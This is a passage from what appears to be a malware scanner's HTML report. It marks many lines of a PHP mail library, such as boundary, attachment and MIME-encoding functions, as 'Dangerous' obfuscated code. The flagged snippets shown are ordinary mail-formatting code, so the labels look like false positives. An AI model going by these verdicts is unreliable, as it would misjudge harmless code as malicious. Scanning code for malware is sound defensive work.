<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
